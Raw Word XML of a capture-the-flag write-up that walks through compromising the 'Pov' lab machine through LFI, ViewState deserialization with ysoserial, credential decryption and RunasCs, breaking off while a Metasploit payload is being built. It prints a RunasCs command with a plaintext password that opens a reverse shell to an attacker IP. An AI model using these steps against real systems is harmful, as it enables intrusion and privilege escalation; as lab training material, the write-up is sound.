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F621" w14:textId="45C559A5" w:rsidR="00E41CEE" w:rsidRDefault="00E41CEE" w:rsidP="00E41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk157632472"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="008634F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">WRITE-UPS FOR </w:t>
      </w:r>
      <w:r w:rsidR="004C3253">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Pov</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008634F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="008634F4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>solve on 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008634F4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</w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidRPr="008634F4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F73F61" w14:textId="77777777" w:rsidR="00E41CEE" w:rsidRDefault="00E41CEE"/>
    <w:p w14:paraId="26B81FBB" w14:textId="54CA1E42" w:rsidR="00E41CEE" w:rsidRDefault="004C3253">
      <w:r>
        <w:t>First of all, we just do a little bit scanning and config /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CC7089" w14:textId="660C6122" w:rsidR="00295601" w:rsidRDefault="00295601">
      <w:r w:rsidRPr="00295601">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79682D9D" wp14:editId="2D99745C">
            <wp:extent cx="5943600" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="197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3C8A" w14:textId="77777777" w:rsidR="00051B05" w:rsidRDefault="00051B05"/>
    <w:p w14:paraId="6FAEA18D" w14:textId="19788C25" w:rsidR="00051B05" w:rsidRDefault="00051B05">
      <w:r w:rsidRPr="005E0D4D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40A52CE6" wp14:editId="669DBE1C">
            <wp:extent cx="5943600" cy="2882900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="144782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222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8AE0" w14:textId="77777777" w:rsidR="00756E68" w:rsidRDefault="00756E68"/>
    <w:p w14:paraId="45E3305B" w14:textId="77777777" w:rsidR="00D46C55" w:rsidRDefault="00D46C55"/>
    <w:p w14:paraId="4D7F9449" w14:textId="77777777" w:rsidR="00D46C55" w:rsidRDefault="00D46C55"/>
    <w:p w14:paraId="6FAE96A7" w14:textId="77777777" w:rsidR="00D46C55" w:rsidRDefault="00D46C55"/>
    <w:p w14:paraId="19726AD5" w14:textId="77777777" w:rsidR="00D46C55" w:rsidRDefault="00D46C55"/>
    <w:p w14:paraId="229AE6FC" w14:textId="1D5ABE56" w:rsidR="00D46C55" w:rsidRDefault="00D46C55">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Looking around at the website, we cannot find anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3026943D" w14:textId="55791EAE" w:rsidR="00756E68" w:rsidRDefault="00756E68">
      <w:r w:rsidRPr="00756E68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DAC7553" wp14:editId="3B8A236E">
            <wp:extent cx="5943600" cy="2872105"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="78613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30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4920" w14:textId="77777777" w:rsidR="006339F0" w:rsidRDefault="006339F0"/>
    <w:p w14:paraId="67D2D150" w14:textId="4EC0F49D" w:rsidR="006339F0" w:rsidRDefault="006339F0">
      <w:r w:rsidRPr="006339F0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B74F849" wp14:editId="12461396">
            <wp:extent cx="5943600" cy="2988945"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="142287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CA6D" w14:textId="77777777" w:rsidR="00A80688" w:rsidRDefault="00A80688"/>
    <w:p w14:paraId="1A14DB89" w14:textId="70EF936C" w:rsidR="00A80688" w:rsidRDefault="00A80688">
      <w:r w:rsidRPr="00A80688">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31F78AC0" wp14:editId="08464E48">
            <wp:extent cx="5943600" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="159410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01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E703" w14:textId="77777777" w:rsidR="004D10E0" w:rsidRDefault="004D10E0"/>
    <w:p w14:paraId="262182A5" w14:textId="77777777" w:rsidR="00205973" w:rsidRDefault="00205973"/>
    <w:p w14:paraId="3F865266" w14:textId="48E77CFC" w:rsidR="00205973" w:rsidRDefault="00D46C55">
      <w:r>
        <w:t>It’s time to gobuster for dir and vhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593AAA1E" w14:textId="77777777" w:rsidR="00205973" w:rsidRDefault="00205973"/>
    <w:p w14:paraId="3A4AFCFC" w14:textId="188B6B3C" w:rsidR="00205973" w:rsidRDefault="00205973">
      <w:r w:rsidRPr="00205973">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="379DAADF" wp14:editId="59CDE9D7">
            <wp:extent cx="5943600" cy="2818765"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="87242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4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D109" w14:textId="77777777" w:rsidR="00205973" w:rsidRDefault="00205973"/>
    <w:p w14:paraId="25C0BC91" w14:textId="3A9D296D" w:rsidR="004D10E0" w:rsidRDefault="004D10E0">
      <w:r w:rsidRPr="004D10E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F90EDCE" wp14:editId="38D1F187">
            <wp:extent cx="5943600" cy="2788285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="160042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249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8D36" w14:textId="77777777" w:rsidR="00D46C55" w:rsidRDefault="00D46C55"/>
    <w:p w14:paraId="0F0BE3AE" w14:textId="1DB02234" w:rsidR="00D46C55" w:rsidRDefault="00D46C55">
      <w:r>
        <w:t>Hurray, we find the dev.pov.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505E2D0" w14:textId="77777777" w:rsidR="00611020" w:rsidRDefault="00611020"/>
    <w:p w14:paraId="5EF96E91" w14:textId="51A13641" w:rsidR="00611020" w:rsidRDefault="00BA2BA0">
      <w:r w:rsidRPr="00BA2BA0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AB3E12" wp14:editId="015D5DD7">
            <wp:extent cx="5943600" cy="3101975"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="51086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68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BF6E" w14:textId="77777777" w:rsidR="009B4288" w:rsidRDefault="009B4288"/>
    <w:p w14:paraId="79346742" w14:textId="63133F00" w:rsidR="009B4288" w:rsidRDefault="009B4288">
      <w:r w:rsidRPr="009B4288">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7464D184" wp14:editId="5EE200D9">
            <wp:extent cx="5943600" cy="2945130"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="202719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983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A49B" w14:textId="77777777" w:rsidR="00B74542" w:rsidRDefault="00B74542"/>
    <w:p w14:paraId="5A4A23F5" w14:textId="017D20B9" w:rsidR="00B74542" w:rsidRDefault="00B74542">
      <w:r>
        <w:t>Looking around a little bit, it’s time to use BurpSuite. I found that the download function seems intriguing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E56E7F1" w14:textId="77777777" w:rsidR="00CB3002" w:rsidRDefault="00CB3002"/>
    <w:p w14:paraId="54EB6146" w14:textId="199F262D" w:rsidR="00CB3002" w:rsidRDefault="00CB3002">
      <w:r w:rsidRPr="00CB3002">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09883C4E" wp14:editId="2E96C49E">
            <wp:extent cx="5943600" cy="3176905"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="83817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740D" w14:textId="77777777" w:rsidR="00DD0962" w:rsidRDefault="00DD0962"/>
    <w:p w14:paraId="058F6E9E" w14:textId="77777777" w:rsidR="00DD0962" w:rsidRDefault="00DD0962"/>
    <w:p w14:paraId="30B249F9" w14:textId="77777777" w:rsidR="00DD0962" w:rsidRDefault="00DD0962"/>
    <w:p w14:paraId="3DFB4FFC" w14:textId="77777777" w:rsidR="00DD0962" w:rsidRDefault="00DD0962"/>
    <w:p w14:paraId="243FD9D6" w14:textId="77777777" w:rsidR="00DD0962" w:rsidRDefault="00DD0962"/>
    <w:p w14:paraId="249EB1F6" w14:textId="0836D4F0" w:rsidR="00DD0962" w:rsidRDefault="00DD0962">
      <w:r>
        <w:t>Nothing useful with the contact page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D64D45F" w14:textId="4094B98A" w:rsidR="00E13D80" w:rsidRDefault="00E13D80">
      <w:r w:rsidRPr="00E13D80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48B940AD" wp14:editId="0277DC36">
            <wp:extent cx="5943600" cy="3025140"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="48954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418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C4CF" w14:textId="77777777" w:rsidR="001C100D" w:rsidRDefault="001C100D"/>
    <w:p w14:paraId="026683CD" w14:textId="77777777" w:rsidR="004D3508" w:rsidRDefault="004D3508"/>
    <w:p w14:paraId="38AB65DC" w14:textId="4AB12E3F" w:rsidR="004D3508" w:rsidRDefault="004D3508">
      <w:r w:rsidRPr="004D3508">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A47F9D6" wp14:editId="7FDA5699">
            <wp:extent cx="5943600" cy="2861310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="893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BD79" w14:textId="77777777" w:rsidR="00CC0669" w:rsidRDefault="00CC0669"/>
    <w:p w14:paraId="051F7541" w14:textId="31789AB1" w:rsidR="00CC0669" w:rsidRDefault="00CC0669">
      <w:r w:rsidRPr="00CC0669">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7338988B" wp14:editId="39D837DB">
            <wp:extent cx="5943600" cy="2356485"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="26014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41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47F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49903149" w14:textId="77777777" w:rsidR="00E609CD" w:rsidRDefault="00E609CD"/>
    <w:p w14:paraId="4254BC9E" w14:textId="49DD99C9" w:rsidR="00E609CD" w:rsidRDefault="00E609CD">
      <w:r>
        <w:t>Now we know the page is use ASP.NET</w:t>
      </w:r>
      <w:r w:rsidR="00F431DB">
        <w:t xml:space="preserve"> with the version 4.0.30319. Suft the Internet I found something useful. Try the link for more in4 =)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA6DF2F" w14:textId="77777777" w:rsidR="001C100D" w:rsidRDefault="001C100D"/>
    <w:p w14:paraId="0148528C" w14:textId="623011DB" w:rsidR="001C100D" w:rsidRDefault="001C100D">
      <w:r w:rsidRPr="001C100D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6929F6BE" wp14:editId="1DC3BC6B">
            <wp:extent cx="5943600" cy="3062605"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="84359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11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F026" w14:textId="77777777" w:rsidR="00167953" w:rsidRDefault="00167953"/>
    <w:p w14:paraId="4B96877E" w14:textId="77777777" w:rsidR="00BC57D0" w:rsidRDefault="00BC57D0"/>
    <w:p w14:paraId="5EE0CB5C" w14:textId="66BF35E4" w:rsidR="00BC57D0" w:rsidRDefault="005F4C63">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00F50EA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4321F472" w14:textId="06A915F6" w:rsidR="003464E3" w:rsidRDefault="003464E3">
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00F50EA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A4ADAB4" w14:textId="77777777" w:rsidR="003464E3" w:rsidRDefault="003464E3"/>
    <w:p w14:paraId="3EB1CC44" w14:textId="5177825B" w:rsidR="005F4C63" w:rsidRDefault="002123C6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Okey, it seems that we have to exploit LFI and VIEWSTATE value. Search the /web.config file as in instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ACE999" w14:textId="05506596" w:rsidR="00167953" w:rsidRDefault="00167953">
      <w:r w:rsidRPr="00167953">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7855D839" wp14:editId="319967F5">
            <wp:extent cx="5943600" cy="3136265"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="2984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35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705C" w14:textId="77777777" w:rsidR="00C56C0B" w:rsidRDefault="00C56C0B"/>
    <w:p w14:paraId="7A7D676D" w14:textId="46D6401D" w:rsidR="00C56C0B" w:rsidRDefault="00C56C0B">
      <w:r>
        <w:t>Now we have the machineKey. Just try with ysoserial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355FB01" w14:textId="77777777" w:rsidR="009C3EA8" w:rsidRDefault="009C3EA8"/>
    <w:p w14:paraId="109888E7" w14:textId="1DCA8CE4" w:rsidR="00295601" w:rsidRDefault="00F771D9">
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00F50EA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/pwntester/ysoserial.net?tab=readme-ov-file</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0199D7F8" w14:textId="77777777" w:rsidR="006D44C0" w:rsidRDefault="006D44C0"/>
    <w:p w14:paraId="21818B7D" w14:textId="4386C4A5" w:rsidR="006D44C0" w:rsidRDefault="006D44C0">
      <w:r w:rsidRPr="006D44C0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2432C48F" wp14:editId="1C26B41D">
            <wp:extent cx="5943600" cy="2689860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44368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87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49" w14:textId="77777777" w:rsidR="00786F37" w:rsidRDefault="00786F37"/>
    <w:p w14:paraId="0BE9D036" w14:textId="518A0FDC" w:rsidR="00786F37" w:rsidRDefault="00786F37">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="388F5805" wp14:editId="5B53DC78">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="83942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238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35D4" w14:textId="77777777" w:rsidR="00C56C0B" w:rsidRDefault="00C56C0B"/>
    <w:p w14:paraId="090012FB" w14:textId="0EB77C62" w:rsidR="00C56C0B" w:rsidRDefault="00C56C0B">
      <w:r>
        <w:t>Finally, inject the payload into VIEWSTATE value we found before</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE91AD9" w14:textId="77777777" w:rsidR="009B519A" w:rsidRDefault="009B519A"/>
    <w:p w14:paraId="078DEB01" w14:textId="7F1DCF73" w:rsidR="009B519A" w:rsidRDefault="009B519A">
      <w:r w:rsidRPr="009B519A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35AC5A9A" wp14:editId="30096274">
            <wp:extent cx="5943600" cy="3041015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="14455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05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7012" w14:textId="77777777" w:rsidR="00C4049E" w:rsidRDefault="00C4049E"/>
    <w:p w14:paraId="32D6BA39" w14:textId="77777777" w:rsidR="00946BC2" w:rsidRDefault="00946BC2"/>
    <w:p w14:paraId="53D1EB40" w14:textId="41F32A28" w:rsidR="00946BC2" w:rsidRDefault="00946BC2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The thing had come, I got the reverse shell as expected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1674F0" w14:textId="72B2E396" w:rsidR="00C4049E" w:rsidRDefault="00C4049E">
      <w:r w:rsidRPr="00C4049E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05AE4F5F" wp14:editId="578AC4C1">
            <wp:extent cx="5943600" cy="1196340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="50741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197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BF3D" w14:textId="77777777" w:rsidR="00757085" w:rsidRDefault="00757085"/>
    <w:p w14:paraId="18300242" w14:textId="30E4C767" w:rsidR="00757085" w:rsidRDefault="00757085">
      <w:r>
        <w:t>Looking around the system, I found some credentials in connection.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3D570" w14:textId="77777777" w:rsidR="00D23B37" w:rsidRDefault="00D23B37"/>
    <w:p w14:paraId="6AB4A017" w14:textId="6F0D69F9" w:rsidR="00D23B37" w:rsidRDefault="00D23B37">
      <w:r w:rsidRPr="00D23B37">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70A768B2" wp14:editId="552FDC48">
            <wp:extent cx="5943600" cy="2642235"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1618087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877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614D" w14:textId="77777777" w:rsidR="0084696D" w:rsidRDefault="0084696D"/>
    <w:p w14:paraId="762F9DC0" w14:textId="64F07803" w:rsidR="0084696D" w:rsidRDefault="0084696D">
      <w:r>
        <w:t>Trying googling, it seems to be a credential for a object by powershell. I decrypted it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A387439" w14:textId="77777777" w:rsidR="00115CCE" w:rsidRDefault="00115CCE"/>
    <w:p w14:paraId="7F1DAFDF" w14:textId="4FD0458A" w:rsidR="00115CCE" w:rsidRDefault="00002528">
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00F50EA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/63639876/powershell-password-decrypt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BEA11A7" w14:textId="77777777" w:rsidR="005649D6" w:rsidRDefault="005649D6"/>
    <w:p w14:paraId="30E6F559" w14:textId="5329B3DA" w:rsidR="005649D6" w:rsidRDefault="005649D6">
      <w:r w:rsidRPr="005649D6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E5878B" wp14:editId="5B733F34">
            <wp:extent cx="5943600" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53873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355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B8A9" w14:textId="77777777" w:rsidR="00413AAE" w:rsidRDefault="00413AAE"/>
    <w:p w14:paraId="4F5F4218" w14:textId="0C673050" w:rsidR="00413AAE" w:rsidRDefault="00413AAE">
      <w:r>
        <w:t>All right, now we have credential for users alaading</w:t>
      </w:r>
      <w:r w:rsidR="00DB1D4F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5926DA5F" w14:textId="77777777" w:rsidR="00DB1D4F" w:rsidRDefault="00DB1D4F"/>
    <w:p w14:paraId="5065D6D0" w14:textId="59476401" w:rsidR="00DB1D4F" w:rsidRDefault="00DB1D4F">
      <w:r>
        <w:t xml:space="preserve">Now, </w:t>
      </w:r>
      <w:r w:rsidR="008E2886">
        <w:t>I have nothing to do. By continuing with searching efforts, I found a file called RunadCs. I search the Internet, and well …, It can help a lot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E07B08C" w14:textId="77777777" w:rsidR="008C24DA" w:rsidRDefault="008C24DA"/>
    <w:p w14:paraId="4FABB8A0" w14:textId="2303BDFB" w:rsidR="008C24DA" w:rsidRDefault="008C24DA">
      <w:r w:rsidRPr="008C24DA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="619C1AC7" wp14:editId="6571F9C4">
            <wp:extent cx="5943600" cy="2800985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106423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306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8A2A" w14:textId="77777777" w:rsidR="003A7DA5" w:rsidRDefault="003A7DA5"/>
    <w:p w14:paraId="26CCA6D7" w14:textId="2FE40C33" w:rsidR="00BD51BB" w:rsidRDefault="00CD0657">
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00F50EA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/antonioC</w:t>
        </w:r>
        <w:r w:rsidRPr="00F50EA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>o</w:t>
        </w:r>
        <w:r w:rsidRPr="00F50EA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>co/RunasCs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="621B2C7C" w14:textId="77777777" w:rsidR="00CD0657" w:rsidRDefault="00CD0657"/>
    <w:p w14:paraId="102211CF" w14:textId="77777777" w:rsidR="00BD51BB" w:rsidRDefault="00BD51BB"/>
    <w:p w14:paraId="5624F511" w14:textId="77777777" w:rsidR="00D42A87" w:rsidRDefault="00D42A87"/>
    <w:p w14:paraId="70444F66" w14:textId="77777777" w:rsidR="00D42A87" w:rsidRDefault="00D42A87"/>
    <w:p w14:paraId="28B8A94C" w14:textId="3BBAE39F" w:rsidR="00D42A87" w:rsidRDefault="00D42A87">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now and use the application to get the second reverse shell on port 4444 with the user alaading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F844BB" w14:textId="77777777" w:rsidR="00D42A87" w:rsidRDefault="00D42A87"/>
    <w:p w14:paraId="1153E48D" w14:textId="4F43A405" w:rsidR="003A7DA5" w:rsidRDefault="003A7DA5">
      <w:r w:rsidRPr="003A7DA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C88AAD" wp14:editId="3AEE5425">
            <wp:extent cx="5943600" cy="1031240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54273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39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DD06" w14:textId="77777777" w:rsidR="00C06DFC" w:rsidRDefault="00C06DFC"/>
    <w:p w14:paraId="4484C83B" w14:textId="2654FAAF" w:rsidR="00672588" w:rsidRDefault="00672588">
      <w:r w:rsidRPr="00672588">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E830F7F" wp14:editId="279B9197">
            <wp:extent cx="5943600" cy="1526540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94447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701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9B5A" w14:textId="77777777" w:rsidR="00C06DFC" w:rsidRDefault="00C06DFC"/>
    <w:p w14:paraId="003006EA" w14:textId="1BE7CD8B" w:rsidR="00C06DFC" w:rsidRDefault="00C06DFC">
      <w:r>
        <w:t>Searching around gave me user.txt as easy as cake.</w:t>
      </w:r>
      <w:r w:rsidR="00E560CE">
        <w:t>!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC9A7D8" w14:textId="77777777" w:rsidR="00AE457A" w:rsidRDefault="00AE457A"/>
    <w:p w14:paraId="6F6F9A5E" w14:textId="2D021A75" w:rsidR="00E560CE" w:rsidRDefault="00E560CE">
      <w:r>
        <w:t>Looking at the RunasCs docs, I found that I can even have more priviledge by adding –bypass-u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0317B2" w14:textId="703D50E9" w:rsidR="00DC2706" w:rsidRDefault="00084C89">
      <w:r w:rsidRPr="00084C89">
        <w:t>.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.177:5555 --bypass-u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685B08D" w14:textId="7B4764C8" w:rsidR="00AE457A" w:rsidRDefault="00AE457A">
      <w:r w:rsidRPr="00AE457A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CF248A9" wp14:editId="46F80F9C">
            <wp:extent cx="5943600" cy="1555115"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="45715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571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44F9" w14:textId="77777777" w:rsidR="00931032" w:rsidRDefault="00931032"/>
    <w:p w14:paraId="62A736A6" w14:textId="77777777" w:rsidR="00C9005A" w:rsidRDefault="00C9005A"/>
    <w:p w14:paraId="469DF1AE" w14:textId="77777777" w:rsidR="00C9005A" w:rsidRDefault="00C9005A"/>
    <w:p w14:paraId="18C0B3E2" w14:textId="77777777" w:rsidR="00C9005A" w:rsidRDefault="00C9005A"/>
    <w:p w14:paraId="27CA57A0" w14:textId="77777777" w:rsidR="00C9005A" w:rsidRDefault="00C9005A"/>
    <w:p w14:paraId="7579E85E" w14:textId="64C98603" w:rsidR="00C9005A" w:rsidRDefault="00C9005A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now, we have the SeDebugPriviledge, searching the Internet, I found that I can escalate the privilege with this =&gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7F3114" w14:textId="77777777" w:rsidR="00C9005A" w:rsidRDefault="00C9005A"/>
    <w:p w14:paraId="43ACFC55" w14:textId="60D4604C" w:rsidR="00931032" w:rsidRDefault="00931032">
      <w:r w:rsidRPr="00931032">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65FB9149" wp14:editId="30D9CFA0">
            <wp:extent cx="5943600" cy="2807970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129188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868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8E83" w14:textId="242B601D" w:rsidR="003F2BD8" w:rsidRDefault="003F2BD8"/>
    <w:p w14:paraId="4BB14812" w14:textId="77777777" w:rsidR="005B075D" w:rsidRDefault="005B075D"/>
    <w:p w14:paraId="45F70984" w14:textId="654A44A7" w:rsidR="005B075D" w:rsidRDefault="00E30232">
      <w:r>
        <w:t>The idea is to sending pay load to get the reverse TCP shell in meterpreter using Metasploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288A427" w14:textId="5DFE3C69" w:rsidR="00E30232" w:rsidRDefault="00E30232" w:rsidP="00E30232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>First, create payload in localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C9D026" w14:textId="7055E69C" w:rsidR="00E30232" w:rsidRDefault="00E30232" w:rsidP="00E30232">
      <w:pPr>
